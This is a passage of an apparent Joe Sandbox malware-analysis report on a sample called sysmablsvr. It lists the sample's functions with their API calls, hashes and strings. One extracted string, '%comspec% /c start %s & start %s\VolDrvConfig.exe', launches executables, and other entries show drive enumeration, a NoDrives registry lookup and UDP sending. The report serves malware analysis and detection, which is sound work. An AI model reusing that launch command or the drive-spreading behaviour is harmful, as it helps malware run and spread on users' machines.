                                              • Opcode ID: 929abe7a9095254e26be5e4d35e4c48d0475e135154847a51b6584f6b16baab1
                                              • Instruction ID: 20bf7a335d7b83d19979346108b4db2f5a5138f5ba8950715db26485b9768e75
                                              • Opcode Fuzzy Hash: 929abe7a9095254e26be5e4d35e4c48d0475e135154847a51b6584f6b16baab1
                                              • Instruction Fuzzy Hash: 84413AB4E40308ABDB10DFA4CC4AFAEB774EB04704F208569E611BA2D1C7B96641CB9D
                                              Function 00405B60 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(004174D8,?,?,?,?,?,00407FAD), ref: 00405B6B
                                              • CreateFileW.KERNEL32(00417708,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407FAD), ref: 00405B85
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                              • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                              • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                              • String ID:
                                              • API String ID: 3956458805-0
                                              • Opcode ID: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction ID: 3caee3762cbdbcce4f49fb41099d7db393733e6e5b5fc44a0020794708857aa0
                                              • Opcode Fuzzy Hash: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction Fuzzy Hash: 51313D74A40308EBEB10DBA4CC4ABAFB774EB44704F208569E601772D0D7B96A81CF99
                                              Function 00406000 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,00000000,0040BE82,006A0266,?,0040BE9E,00000000,0040D17C,?), ref: 0040600F
                                              • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                              • CreateFileW.KERNEL32(00417708,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                              • LeaveCriticalSection.KERNEL32(004174D8,?,?,?,?,?,?,0040BE9E,00000000,0040D17C,?), ref: 00406248
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                              • String ID:
                                              • API String ID: 1457358591-0
                                              • Opcode ID: 2b9af9a80e0350e1b964868311a4eed9a9ef636119a8ca78730ff9e844c2d842
                                              • Instruction ID: d2a8f2c597d4f808d2c136561af7b6c80c21d69a530c7dbbc8373d1e9f004416
                                              • Opcode Fuzzy Hash: 2b9af9a80e0350e1b964868311a4eed9a9ef636119a8ca78730ff9e844c2d842
                                              • Instruction Fuzzy Hash: 6071E0B4E042099BCB04CF98D981FEFBBB1BB48304F14816DE505BB382D779A951CBA5
                                              Function 0040E670 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction ID: 498a00270a4ac3f3e732f182914c0c13a71c1caacf2de73c52121c1bdff13e9d
                                              • Opcode Fuzzy Hash: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction Fuzzy Hash: D5412E74A0020AEFDB04DF95C884FAFB7B9BF48304F108969E515A7390D778AE85CB95
                                              Function 0040E7D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction ID: f37cc5fa491f806f20af1ba12fe7b13e6bb3fdd54c67fa744f8c06207b50935d
                                              • Opcode Fuzzy Hash: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction Fuzzy Hash: D1412DB5A0020ADFCB14DF99C884BAFB7B9BF48304F108569E515B7390D778AE85CB94
                                              Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              • Opcode ID: 5e75d3bdf23019904cb63c7272498dca16bbf89365b4ea4552ce7bb9462c7b35
                                              • Instruction ID: 6ff3262b9ae864165baf17eb68ae52fc582ecffe48c2a7281556c95dbf3b24cf
                                              • Opcode Fuzzy Hash: 5e75d3bdf23019904cb63c7272498dca16bbf89365b4ea4552ce7bb9462c7b35
                                              • Instruction Fuzzy Hash: 8C31E172200215ABC710AFB5ED8CAD7B7A8FF54324F00463EF55AD3280DB79A8448B99
                                              Function 00406400 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040640B
                                              • CoCreateInstance.OLE32(00412A48,00000000,00000001,00412A28,?), ref: 00406423
                                              • wsprintfW.USER32 ref: 00406456
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInitializeInstancewsprintf
                                              • String ID: %comspec%$/c start %s & start %s\VolDrvConfig.exe$Gh@
                                              • API String ID: 2038452267-1238916929
                                              • Opcode ID: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction ID: 7d2455aabe9eb384640674d95cb3f7402ea72c7f03b095a020dcafb7bbec31f6
                                              • Opcode Fuzzy Hash: aaa96ca59010518e18a87943b9af67a6363d673d16705643510165f5408d9052
                                              • Instruction Fuzzy Hash: 8E31C975A40208EFCB04DF98D885EDEB7B5EF88704F108199F519A73A5CA74AE81CB54
                                              Function 0040E811 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction ID: 0db10e415d6a1e8faee94fa1aa357f29b7cea0d9451b7bd8199af60d13ceb70c
                                              • Opcode Fuzzy Hash: 88b0517ec26916889f8b96c67c87da2334269be0de7e35ae2345a8a23bc4b222
                                              • Instruction Fuzzy Hash: 98312AB5E0020ADFCB14DF99D884BAFB7B5BF88304F108569E514B7390D778AA81CB94
                                              Function 0040E6B1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction ID: f860d819dcfac7245c0065b1f48ab1f28a181454cf029f87bdd60df825f867a0
                                              • Opcode Fuzzy Hash: f0bcedd38c1e30f619de3414b93aa3d94c9df312bc97db08d9b07421bf86f66e
                                              • Instruction Fuzzy Hash: B9311D74A0020A9FCB04CF99D884FEFB7B5BF88304F148969E514B7390D778AA85CB95
                                              Function 004073B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$CacheDeleteEntrywsprintf
                                              • String ID: %s%s
                                              • API String ID: 1447977647-3252725368
                                              • Opcode ID: b3aa12a9ac6c1bea71ad27052cd7355f0876685bd87c0f59df55197cdbb1ba38
                                              • Instruction ID: 945b1e68ff25bd35ce4625b60af53a64f9c21a9b46b3aa14aa85a39d9b5f9782
                                              • Opcode Fuzzy Hash: b3aa12a9ac6c1bea71ad27052cd7355f0876685bd87c0f59df55197cdbb1ba38
                                              • Instruction Fuzzy Hash: 5D310DB4C00218EFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF59
                                              Function 00406340 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00406346
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                              • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              Strings
                                              • NoDrives, xrefs: 004063B8
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                              • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                              • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
                                              Function 0040D6F0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D7E0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D820
                                                • Part of subcall function 0040D7E0: CloseHandle.KERNEL32(?), ref: 0040D839
                                              • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                              • DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                              • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2251373460-0
                                              • Opcode ID: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction ID: 832ae4800ebcb00f90e7428fbbdd4da527039cf188cbed956f615c5464689476
                                              • Opcode Fuzzy Hash: 79fa7f5129bcfcfc5e35f54f723da72931e91f9957c0ae906c73dd34cb907117
                                              • Instruction Fuzzy Hash: 2C31F874A00208EFDB04DF94D889F9EBBB5FB49304F0085A9E905A7390D775AA95CF54
                                              Function 00409440 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl_aullshr
                                              • String ID:
                                              • API String ID: 673498613-0
                                              • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction ID: c7f26e6fe3f6e47823c68d9e93f939c843ab0f3ebbce24f5146439a699fa7f9b
                                              • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                              • Instruction Fuzzy Hash: CC114F326005186B8B10EF9EC44269ABBD6EF84360B15C136FC2CCF319D634D9414BD4
                                              Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                              • htons.WS2_32(?), ref: 00401281
                                              • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedhtonsmemcpysendto
                                              • String ID: pdu
                                              • API String ID: 2164660128-2320407122
                                              • Opcode ID: 8ae6570444e5f91760108b530f1a08cb32bd2fc07e3f7a4ef94bae8ae05db212
                                              • Instruction ID: 395797021da18ac5dc0c4ab187d218299f1ec32cbdde21a351b7e81b9c40248d
                                              • Opcode Fuzzy Hash: 8ae6570444e5f91760108b530f1a08cb32bd2fc07e3f7a4ef94bae8ae05db212
                                              • Instruction Fuzzy Hash: E83180762083009BC710DF69D884A9BBBF4AFC9714F04456EFD9897381D634D91587AB
                                              Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                              • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                              • String ID:
                                              • API String ID: 3966618661-0
                                              • Opcode ID: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction ID: 36d18bb318df5a029dedd03b2acd005dba350197efc47ce95ae0e9b03ff24c88
                                              • Opcode Fuzzy Hash: ce840b8076e102032727fd217b964f9416792ac0f183dc073a12a4941b732ffe
                                              • Instruction Fuzzy Hash: 7241A175604A01ABC714EB39D848797F3A4BF84314F14827EE82D933D1E739A855CB99
                                              Function 0040B110 Relevance: 7.6, APIs: 5, Instructions: 74fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00417D28,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B1A8
                                              • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B1C9
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B1D3
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B1DD
                                              • InterlockedExchange.KERNEL32(00416900,0000003D), ref: 0040B1EA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                              • String ID:
                                              • API String ID: 442028454-0
                                              • Opcode ID: a0a4e6ae3ed30183f399e8ba9aee31b57bdf5208d54d0e8c38c9924f8c3679e4
                                              • Instruction ID: c603907199676edbd5c7d0fa982afae34b74f891853afe3642d2180ffa8dca70
                                              • Opcode Fuzzy Hash: a0a4e6ae3ed30183f399e8ba9aee31b57bdf5208d54d0e8c38c9924f8c3679e4
                                              • Instruction Fuzzy Hash: 8D313EB4A40209EBCB14DF94EC85FAEB7B4FB48300F20C569E515673D0D774AA41DB99
                                              Function 00409020 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _allshl
                                              • String ID:
                                              • API String ID: 435966717-0
                                              • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                              • Instruction ID: 6393123168de4f4826dca7712cb04f948d5e4027293efa58ed578d500b7b4a08
                                              • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                              • Instruction Fuzzy Hash: DDF03172901428AB9750EEFF84424CBF7E6AF9C368B219176FC18E3260E9709D0546F2
                                              Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                              • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                              • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                                • Part of subcall function 0040A740: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A79B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                              • String ID: pdu
                                              • API String ID: 309973729-2320407122
                                              • Opcode ID: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction ID: d282b52b3110f6f030980250f42d45aa65f4851f6724e2164e4de9b2c85264d0
                                              • Opcode Fuzzy Hash: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction Fuzzy Hash: 6101D6765003009BCB20AF51ECC0E9B7779AF48311704467AFD04AB396C738E84187B9
                                              Function 004062C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                              • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
